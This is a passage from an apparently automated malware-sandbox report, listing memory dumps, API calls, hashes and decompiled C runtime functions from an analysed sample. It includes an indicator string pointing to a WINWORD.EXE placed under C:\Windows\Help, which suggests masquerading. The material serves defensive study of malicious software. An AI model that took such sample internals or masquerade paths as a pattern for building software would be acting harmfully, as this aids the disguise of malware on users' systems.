    • Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: FileWrite__fassign$ConsoleErrorLast
    • String ID:
    • API String ID: 4031098158-0
    • Opcode ID: 8b09366d61ee848c0bde416abad5ef07ab56445936a9bf335709ad2b8c18e806
    • Instruction ID: 9b993b5439eb7f88df6c308a0abe4cfc020e5bb4b9f0e1ea8ca4756328d0141c
    • Opcode Fuzzy Hash: 8b09366d61ee848c0bde416abad5ef07ab56445936a9bf335709ad2b8c18e806
    • Instruction Fuzzy Hash: BCD1C071D042989FCF11CFA8C9849EDBBB5FF49328F24456AF915BB241D731AA06CB60
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 0303E5FC
    • __fassign.LIBCMT ref: 0303E7E1
    • __fassign.LIBCMT ref: 0303E7FE
    • WriteFile.KERNEL32(?,0303B5DD,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0303E846
    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0303E886
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0303E92E
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: FileWrite__fassign$ConsoleErrorLastOutput
    • String ID:
    • API String ID: 1735259414-0
    • Opcode ID: fee2b17ddd0021861d407ddf8afcb66cd3d33fb2a1cd45cd1fe99d25d801940e
    • Instruction ID: 1c10687f461ca18737eb0b3ad050da96534780d02beed0f1eb190d4582e21cb9
    • Opcode Fuzzy Hash: fee2b17ddd0021861d407ddf8afcb66cd3d33fb2a1cd45cd1fe99d25d801940e
    • Instruction Fuzzy Hash: B3C18E7AD022589FCF15CFA8C8809EDFBB9EF49314F28426AE855BB241D7319946CF50
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetLastError.KERNEL32(?,?,030334C3,03032A85,030324AF), ref: 0303398E
    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0303399C
    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 030339B5
    • SetLastError.KERNEL32(00000000,?,030334C3,03032A85,030324AF), ref: 03033A07
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: ErrorLastValue___vcrt_
    • String ID:
    • API String ID: 3852720340-0
    • Opcode ID: 5c638b57e33cef42f0282dd8c6c9d6815e16ca97f5f5c0d9c871df29bbc7fc5c
    • Instruction ID: eb0923fa3e8e633631aa9947c6c9ebe8f6cf5a181b649672a617039f2226901d
    • Opcode Fuzzy Hash: 5c638b57e33cef42f0282dd8c6c9d6815e16ca97f5f5c0d9c871df29bbc7fc5c
    • Instruction Fuzzy Hash: EB014C7F60B711BEE728F5757CC869A2ADCDB4357972003AAE1209A0E0EF154C004184
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E6D8662E0(void* __ecx) {
    				void* _t4;
    				void* _t8;
    				void* _t11;
    				void* _t13;
    				void* _t14;
    				void* _t18;
    				void* _t23;
    				long _t24;
    				void* _t27;
    
    				_t13 = __ecx;
    				if( *0x6d877020 != 0xffffffff) {
    					_t24 = GetLastError();
    					_t11 = E6D866717(_t13, __eflags,  *0x6d877020);
    					_t14 = _t23;
    					__eflags = _t11 - 0xffffffff;
    					if(_t11 == 0xffffffff) {
    						L5:
    						_t11 = 0;
    					} else {
    						__eflags = _t11;
    						if(__eflags == 0) {
    							_t4 = E6D866752(_t14, __eflags,  *0x6d877020, 0xffffffff);
    							__eflags = _t4;
    							if(_t4 != 0) {
    								_push(0x28);
    								_t27 = E6D867B55();
    								_t18 = 1;
    								__eflags = _t27;
    								if(__eflags == 0) {
    									L8:
    									_t11 = 0;
    									E6D866752(_t18, __eflags,  *0x6d877020, 0);
    								} else {
    									_t8 = E6D866752(_t18, __eflags,  *0x6d877020, _t27);
    									_pop(_t18);
    									__eflags = _t8;
    									if(__eflags != 0) {
    										_t11 = _t27;
    										_t27 = 0;
    										__eflags = 0;
    									} else {
    										goto L8;
    									}
    								}
    								E6D8667D7(_t27);
    							} else {
    								goto L5;
    							}
    						}
    					}
    					SetLastError(_t24);
    					return _t11;
    				} else {
    					return 0;
    				}
    			}












    0x6d8662e0
    0x6d8662e7
    0x6d8662fa
    0x6d866301
    0x6d866303
    0x6d866304
    0x6d866307
    0x6d866320
    0x6d866320
    0x6d866309
    0x6d866309
    0x6d86630b
    0x6d866315
    0x6d86631c
    0x6d86631e
    0x6d866325
    0x6d86632e
    0x6d866331
    0x6d866332
    0x6d866334
    0x6d866348
    0x6d866348
    0x6d866351
    0x6d866336
    0x6d86633d
    0x6d866343
    0x6d866344
    0x6d866346
    0x6d86635a
    0x6d86635c
    0x6d86635c
    0x00000000
    0x00000000
    0x00000000
    0x6d866346
    0x6d86635f
    0x00000000
    0x00000000
    0x00000000
    0x6d86631e
    0x6d86630b
    0x6d866367
    0x6d866371
    0x6d8662e9
    0x6d8662eb
    0x6d8662eb

    APIs
    • GetLastError.KERNEL32(00000001,?,6D865F78,6D86437D,6D86463F,?,6D864877,?,00000001,?,?,00000001,?,6D875538,0000000C,6D864970), ref: 6D8662EE
    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6D8662FC
    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6D866315
    • SetLastError.KERNEL32(00000000,6D864877,?,00000001,?,?,00000001,?,6D875538,0000000C,6D864970,?,00000001,?), ref: 6D866367
    Memory Dump Source
    • Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true
    • Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ErrorLastValue___vcrt_
    • String ID:
    • API String ID: 3852720340-0
    • Opcode ID: 2479f36a4e1aa33d382ffc5b9f2f1bdd0ef5f88f41a57b4f5a5aa159ea083745
    • Instruction ID: a58860bc66ab8ba8b0e5634170bc30543c58f14aa5bca8d9060a7106b5ebbfd2
    • Opcode Fuzzy Hash: 2479f36a4e1aa33d382ffc5b9f2f1bdd0ef5f88f41a57b4f5a5aa159ea083745
    • Instruction Fuzzy Hash: 7901D873A0C7E25EE7110A795D8EB2A2A78FB0BF79B210BB9F224450D0EF114840D1F0
    Uniqueness

    Uniqueness Score: -1.00%

    Strings
    • C:\Windows\Help\Windows\WINWORD.EXE, xrefs: 0303A15F
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID:
    • String ID: C:\Windows\Help\Windows\WINWORD.EXE
    • API String ID: 0-204361137
    • Opcode ID: afcbe30a443fd80d3368bc2fac1e358dd509ef7c3ca818aa1c174d1b9ed609f0
    • Instruction ID: c9306bdc1ebf63389481b996b42a42c7484414c9370bc7e692088d4466db26f7
    • Opcode Fuzzy Hash: afcbe30a443fd80d3368bc2fac1e358dd509ef7c3ca818aa1c174d1b9ed609f0
    • Instruction Fuzzy Hash: 8021F6B5706205BFDB60EF798C40EAB77ACEF422647148614F8999B150E731DC2087A0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6D868D02(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
    				intOrPtr _t14;
    				intOrPtr _t15;
    				intOrPtr _t17;
    				intOrPtr _t36;
    				intOrPtr* _t38;
    				intOrPtr _t39;
    
    				_t38 = _a4;
    				if(_t38 != 0) {
    					__eflags =  *_t38;
    					if( *_t38 != 0) {
    						_t14 = E6D869796(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
    						__eflags = _t14;
    						if(__eflags != 0) {
    							_t36 = _a8;
    							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
    							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
    								L10:
    								_t15 = E6D869796(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
    								__eflags = _t15;
    								if(__eflags != 0) {
    									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
    									_t17 = 0;
    									__eflags = 0;
    								} else {
    									E6D866A25(GetLastError());
    									_t17 =  *((intOrPtr*)(E6D866A5B(__eflags)));
    								}
    								L13:
    								L14:
    								return _t17;
    							}
    							_t17 = E6D868DC9(_t36, _t14);
    							__eflags = _t17;
    							if(_t17 != 0) {
    								goto L13;
    							}
    							goto L10;
    						}
    						E6D866A25(GetLastError());
    						_t17 =  *((intOrPtr*)(E6D866A5B(__eflags)));
    						goto L14;
    					}
    					_t39 = _a8;
    					__eflags =  *((intOrPtr*)(_t39 + 0xc));
    					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
    						L5:
    						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
    						_t17 = 0;
    						 *((intOrPtr*)(_t39 + 0x10)) = 0;
    						goto L14;
    					}
    					_t17 = E6D868DC9(_t39, 1);
    					__eflags = _t17;
    					if(_t17 != 0) {
    						goto L14;
    					}
    					goto L5;
    				}
    				E6D868DF0(_a8);
    				return 0;
    			}









    0x6d868d08
    0x6d868d0d
    0x6d868d21
    0x6d868d24
    0x6d868d56
    0x6d868d5e
    0x6d868d60
    0x6d868d79
    0x6d868d7c
    0x6d868d7f
    0x6d868d8d
    0x6d868d9c
    0x6d868da4
    0x6d868da6
    0x6d868dbf
    0x6d868dc2
    0x6d868dc2
    0x6d868da8
    0x6d868daf
    0x6d868dba
    0x6d868dba
    0x6d868dc4
    0x6d868dc5
    0x00000000
    0x6d868dc5
    0x6d868d84
    0x6d868d89
    0x6d868d8b
    0x00000000
    0x00000000
    0x00000000
    0x6d868d8b
    0x6d868d69
    0x6d868d74
    0x00000000
    0x6d868d74
    0x6d868d26
    0x6d868d29
    0x6d868d2c
    0x6d868d3f
    0x6d868d42
    0x6d868d44
    0x6d868d46
    0x00000000
    0x6d868d46
    0x6d868d32
    0x6d868d37
    0x6d868d39
    0x00000000
    0x00000000
    0x00000000
    0x6d868d39
    0x6d868d12
    0x00000000

    Strings
    • C:\Windows\Help\Windows\WINWORD.EXE, xrefs: 6D868D07
    Memory Dump Source
    • Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true
    • Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID: C:\Windows\Help\Windows\WINWORD.EXE
    • API String ID: 0-204361137
    • Opcode ID: 0ac9d8fee5988ecf0dbc5b68f172a8f40798feacfe896d9e56e895c6a8562905
    • Instruction ID: d1be6c692ed8eef3ad538fe4ba97480a8861e96c3cb1a04a2c58ed80e6fbabd3
    • Opcode Fuzzy Hash: 0ac9d8fee5988ecf0dbc5b68f172a8f40798feacfe896d9e56e895c6a8562905
    • Instruction Fuzzy Hash: FE214C7160829AAF97119F698C88E6A77BDEF533B97118F15F618971C0EB31DC0086B0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • FreeLibrary.KERNEL32(00000000,?,?,?,?,03034245,00000000,?,00000001,?,?,030342BC,00000001,FlsFree,03044C84,FlsFree), ref: 03034214
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: FreeLibrary
    • String ID: api-ms-
    • API String ID: 3664257935-2084034818
    • Opcode ID: d929a6984a1c6f515baf3e7ced3a1408a6a3ac50145a3cb6d31623766aa9f22b
    • Instruction ID: 939431d07bbcfcfb4eee49df9f5702f80b5baed26a45513ce77c060ebfbb8774
    • Opcode Fuzzy Hash: d929a6984a1c6f515baf3e7ced3a1408a6a3ac50145a3cb6d31623766aa9f22b
    • Instruction Fuzzy Hash: 1411E376A03621ABDB32DA6F9C45B5D37DCAF02760F190260E910FF280D774E90486D4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6D8665BE(void* __ecx, signed int* _a4, intOrPtr _a8) {
    				WCHAR* _v8;
    				signed int _t11;
    				WCHAR* _t12;
    				struct HINSTANCE__* _t16;
    				struct HINSTANCE__* _t18;
    				signed int* _t22;
    				signed int* _t26;
    				struct HINSTANCE__* _t29;
    				WCHAR* _t31;
    				void* _t32;
    
    				_t26 = _a4;
    				while(_t26 != _a8) {
    					_t11 =  *_t26;
    					_t22 = 0x6d8c144c + _t11 * 4;
    					_t29 =  *_t22;
    					if(_t29 == 0) {
    						_t12 =  *(0x6d870df0 + _t11 * 4);
    						_v8 = _t12;
    						_t29 = LoadLibraryExW(_t12, 0, 0x800);
    						if(_t29 != 0) {
    							L13:
    							 *_t22 = _t29;
    							if( *_t22 != 0) {
    								FreeLibrary(_t29);
    							}
    							L15:
    							_t16 = _t29;
    							L12:
    							return _t16;
    						}
    						_t18 = GetLastError();
    						if(_t18 != 0x57) {
    							L8:
    							 *_t22 = _t18 | 0xffffffff;
    							L9:
    							_t26 =  &(_t26[1]);
    							continue;
    						}
    						_t31 = _v8;
    						_t18 = E6D867C88(_t31, L"api-ms-", 7);
    						_t32 = _t32 + 0xc;
    						if(_t18 == 0) {
    							goto L8;
    						}
    						_t18 = LoadLibraryExW(_t31, 0, 0);
    						_t29 = _t18;
    						if(_t29 != 0) {
    							goto L13;
    						}
    						goto L8;
    					}
    					if(_t29 != 0xffffffff) {
    						goto L15;
    					}
    					goto L9;
    				}
    				_t16 = 0;
    				goto L12;
    			}













    0x6d8665c5
    0x6d866639
    0x6d8665ca
    0x6d8665cc
    0x6d8665d3
    0x6d8665d7
    0x6d8665e0
    0x6d8665ef
    0x6d8665f8
    0x6d8665fc
    0x6d866645
    0x6d866647
    0x6d86664b
    0x6d86664e
    0x6d86664e
    0x6d866654
    0x6d866654
    0x6d866640
    0x6d866644
    0x6d866644
    0x6d8665fe
    0x6d866607
    0x6d866631
    0x6d866634
    0x6d866636
    0x6d866636
    0x00000000
    0x6d866636
    0x6d866609
    0x6d866614
    0x6d866619
    0x6d86661e
    0x00000000
    0x00000000
    0x6d866625
    0x6d86662b
    0x6d86662f
    0x00000000
    0x00000000
    0x00000000
    0x6d86662f
    0x6d8665dc
    0x00000000
    0x00000000
    0x00000000
    0x6d8665de
    0x6d86663e
    0x00000000

    APIs
    • FreeLibrary.KERNEL32(00000000,?,?,6D86667F,00000000,?,00000001,00000000,?,6D8666F6,00000001,FlsFree,6D870EAC,FlsFree,00000000), ref: 6D86664E
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true
    • Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: FreeLibrary
    • String ID: api-ms-
    • API String ID: 3664257935-2084034818
    • Opcode ID: b981d2259239d65a06176d822e080b03c5413221223203eca27175b7ec1c5c3d
    • Instruction ID: 5d57a494004c218d93630ef0bc26941b8dd9840f1d796ef3711def93854e2a02
    • Opcode Fuzzy Hash: b981d2259239d65a06176d822e080b03c5413221223203eca27175b7ec1c5c3d
    • Instruction Fuzzy Hash: 4311A332A442B6ABDF128B69AC4EB5D37B4AF07774F114991FA10F7280D770E9008AF1
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,03035FAB,?,?,03035F73,?,?,?), ref: 0303600E
    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 03036021
    • FreeLibrary.KERNEL32(00000000,?,?,03035FAB,?,?,03035F73,?,?,?), ref: 03036044
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: AddressFreeHandleLibraryModuleProc
    • String ID: CorExitProcess$mscoree.dll
    • API String ID: 4061214504-1276376045
    • Opcode ID: 03ff6a88ac6314cee6fa3f7462dba58fd506b16ec74a4ac53da0a6c7c9c793ea
    • Instruction ID: 3b207bf37a0af6fa8497723f93865112f9826773d710fdc48d8abdb09b787254
    • Opcode Fuzzy Hash: 03ff6a88ac6314cee6fa3f7462dba58fd506b16ec74a4ac53da0a6c7c9c793ea
    • Instruction Fuzzy Hash: 4EF08275602219FBCB21EBA2DD0BBDEBAB8EB11756F140060B501A1150CBB98B10DA90
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 25%
    			E6D866FAA(void* __ecx, intOrPtr _a4) {
    				signed int _v8;
    				_Unknown_base(*)()* _t8;
    				_Unknown_base(*)()* _t14;
    
    				_v8 = _v8 & 0x00000000;
    				_t8 =  &_v8;
    				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
    				if(_t8 != 0) {
    					_t8 = GetProcAddress(_v8, "CorExitProcess");
    					_t14 = _t8;
    					if(_t14 != 0) {
    						 *0x6d870168(_a4);
    						_t8 =  *_t14();
    					}
    				}
    				if(_v8 != 0) {
    					return FreeLibrary(_v8);
    				}
    				return _t8;
    			}






    0x6d866fb0
    0x6d866fb4
    0x6d866fbf
    0x6d866fc7
    0x6d866fd2
    0x6d866fd8
    0x6d866fdc
    0x6d866fe3
    0x6d866fe9
    0x6d866fe9
    0x6d866feb
    0x6d866ff0
    0x00000000
    0x6d866ff5
    0x6d866ffc

    APIs
    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6D866F5C,?,?,6D866F24,?,00000001,?), ref: 6D866FBF
    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6D866FD2
    • FreeLibrary.KERNEL32(00000000,?,?,6D866F5C,?,?,6D866F24,?,00000001,?), ref: 6D866FF5
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true
    • Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AddressFreeHandleLibraryModuleProc
    • String ID: CorExitProcess$mscoree.dll
    • API String ID: 4061214504-1276376045
    • Opcode ID: 24ab65e7c830cfd4927eadcdd850ee21b620deaea9b51ef3eb1827d220652844
    • Instruction ID: 18a5909e6c4061313bb2f10993aaa03dceecd958110ecca39c98f4ee4f13f14b
    • Opcode Fuzzy Hash: 24ab65e7c830cfd4927eadcdd850ee21b620deaea9b51ef3eb1827d220652844
    • Instruction Fuzzy Hash: A3F01C31904269FBDF119B61CD1EFAE7F79EB06766F1004A0F411A1550CB358A40EBE0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: dllmain_raw$dllmain_crt_dispatch
    • String ID:
    • API String ID: 3136044242-0
    • Opcode ID: d7fed6d5e771f389a491f65bafd3df0b51d8120dca44c098603f1968f39e4bca
    • Instruction ID: 6df51e7dd2293f43eb21f3cb11b3e95ff54a883f1d675d3e33a85ad0e36753bb
    • Opcode Fuzzy Hash: d7fed6d5e771f389a491f65bafd3df0b51d8120dca44c098603f1968f39e4bca
    • Instruction Fuzzy Hash: 6B21A172E0322AEBDB61DF57DC40AAF7AB9EFC1A90F594115F8156B218C2318D418BA0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: dllmain_raw$dllmain_crt_dispatch
    • String ID:
    • API String ID: 3136044242-0
    • Opcode ID: 0d121a4d39fdeb25e2afcff58211810095a6f5827f427704cdd7849e35a90e90
    • Instruction ID: 93c486ca524158ae9abccc4e8d2858bc33b74e09daa76de6ba8e70f15396bdb9
    • Opcode Fuzzy Hash: 0d121a4d39fdeb25e2afcff58211810095a6f5827f427704cdd7849e35a90e90
    • Instruction Fuzzy Hash: 7E2195F2E03219EBDB61EF55CC449AF7AA9EB81A94F054135FC186B216D7308F418BE0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: _free
    • String ID:
    • API String ID: 269201875-0
    • Opcode ID: 10af83ba132e3f3a28f618a19dc99005e4d14738c0886383f729278ecb27c0cb
    • Instruction ID: 5a0581a05db536229bf6738ff8896e12ac442d0b2f2cc37795b483352a17cfac
    • Opcode Fuzzy Hash: 10af83ba132e3f3a28f618a19dc99005e4d14738c0886383f729278ecb27c0cb
    • Instruction Fuzzy Hash: 32F0367261B710ABD760DB58E9C5C56B3E9FA447A0758A805F048DB588CB71F8C08664
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: _free
    • String ID:
    • API String ID: 269201875-0
    • Opcode ID: 6d2d583b1334b5f3b1b08f55b8bb08f7d7543dc903b372f84ad1f3acd2eb1875
    • Instruction ID: 6401b8343e22724a7d788972d3f58b68b6ba59d73d2aa65c500969111fc25509
    • Opcode Fuzzy Hash: 6d2d583b1334b5f3b1b08f55b8bb08f7d7543dc903b372f84ad1f3acd2eb1875
    • Instruction Fuzzy Hash: 59F06272416314AFCA64DF55FCE1E4BB3DEAB423203A94809F847DB950CB30F9808660
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • _free.LIBCMT ref: 0303BC1A
      • Part of subcall function 03037F3F: HeapFree.KERNEL32(00000000,00000000,?,0303727A), ref: 03037F55
      • Part of subcall function 03037F3F: GetLastError.KERNEL32(?,?,0303727A), ref: 03037F67
    • _free.LIBCMT ref: 0303BC2C
    • _free.LIBCMT ref: 0303BC3E
    • _free.LIBCMT ref: 0303BC50
    • _free.LIBCMT ref: 0303BC62
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 08784d9304962b264735e9288e52a06cac758de2e80e72d30e7e79d5e183fac1
    • Instruction ID: d4ab0d0904a91796725b77d83df3d99771f17d5f782ffaf361ddf6ec9e285165
    • Opcode Fuzzy Hash: 08784d9304962b264735e9288e52a06cac758de2e80e72d30e7e79d5e183fac1
    • Instruction Fuzzy Hash: 7CF012FA527300BBE670EA55F6C1C5AB3DDFB46B547685809F058DB600CF38F9808694
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6D86C96F(intOrPtr* _a4) {
    				intOrPtr _t6;
    				intOrPtr* _t21;
    				void* _t23;
    				void* _t24;
    				void* _t25;
    				void* _t26;
    				void* _t27;
    
    				_t21 = _a4;
    				if(_t21 != 0) {
    					_t23 =  *_t21 -  *0x6d877708; // 0x6d877758
    					if(_t23 != 0) {
    						E6D867CC2(_t7);
    					}
    					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x6d87770c; // 0x6d8c1a54
    					if(_t24 != 0) {
    						E6D867CC2(_t8);
    					}
    					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x6d877710; // 0x6d8c1a54
    					if(_t25 != 0) {
    						E6D867CC2(_t9);
    					}
    					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x6d877738; // 0x6d87775c
    					if(_t26 != 0) {
    						E6D867CC2(_t10);
    					}
    					_t6 =  *((intOrPtr*)(_t21 + 0x34));
    					_t27 = _t6 -  *0x6d87773c; // 0x6d8c1a58
    					if(_t27 != 0) {
    						return E6D867CC2(_t6);
    					}
    				}
    				return _t6;
    			}










    0x6d86c975
    0x6d86c97a
    0x6d86c97e
    0x6d86c984
    0x6d86c987
    0x6d86c98c
    0x6d86c990
    0x6d86c996
    0x6d86c999
    0x6d86c99e
    0x6d86c9a2
    0x6d86c9a8
    0x6d86c9ab
    0x6d86c9b0
    0x6d86c9b4
    0x6d86c9ba
    0x6d86c9bd
    0x6d86c9c2
    0x6d86c9c3
    0x6d86c9c6
    0x6d86c9cc
    0x00000000
    0x6d86c9d4
    0x6d86c9cc
    0x6d86c9d7

    APIs
    • _free.LIBCMT ref: 6D86C987
      • Part of subcall function 6D867CC2: HeapFree.KERNEL32(00000000,00000000,?,6D86CA02,?,00000000,?,00000000,?,6D86CA29,?,00000007,?,?,6D86ABCC,?), ref: 6D867CD8
      • Part of subcall function 6D867CC2: GetLastError.KERNEL32(?,?,6D86CA02,?,00000000,?,00000000,?,6D86CA29,?,00000007,?,?,6D86ABCC,?,?), ref: 6D867CEA
    • _free.LIBCMT ref: 6D86C999
    • _free.LIBCMT ref: 6D86C9AB
    • _free.LIBCMT ref: 6D86C9BD
    • _free.LIBCMT ref: 6D86C9CF
    Memory Dump Source
    • Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true
    • Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: d7960a81077e2c3b70a6045a984649efacec8e238e15f4dac2b3e1ee74c87019
    • Instruction ID: 56d23a9adf57b08d1f93aec1180b620a1e7acea7b30cac5fc5c761387d354593
    • Opcode Fuzzy Hash: d7960a81077e2c3b70a6045a984649efacec8e238e15f4dac2b3e1ee74c87019
    • Instruction Fuzzy Hash: 80F03C71A0869567CB00CA6CE98CE2A77E9EA063703615C05F118D7A0ACB30F880C6F0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: _free
    • String ID: *?
    • API String ID: 269201875-2564092906
    • Opcode ID: ea6d617d872e08b4dda1ad599ceca42be339af1135a4dd483ddd6d01a7a467d0
    • Instruction ID: cc91a18cc8b347bb9859281199bdd827ae802af160659a294195788dc39a67d1
    • Opcode Fuzzy Hash: ea6d617d872e08b4dda1ad599ceca42be339af1135a4dd483ddd6d01a7a467d0
    • Instruction Fuzzy Hash: BC614E75E012199FDF14DFA8C9805EDFBF9EF88320B1881AAD855E7704E771AE418B90
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: _free
    • String ID: *?
    • API String ID: 269201875-2564092906
    • Opcode ID: f43978f0378dcc461f357f0057556c23c851ec20f60f8e4bb2fcbb969ddee30d
    • Instruction ID: d469817268035100b883854ee500d73b94edb27fccbcdf905f788fb9c1054213
    • Opcode Fuzzy Hash: f43978f0378dcc461f357f0057556c23c851ec20f60f8e4bb2fcbb969ddee30d
    • Instruction Fuzzy Hash: CC614FB6E012199FDB14CFA8C9805EDFBF9FF89310B1881A9D855E7300D7719E418B90
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
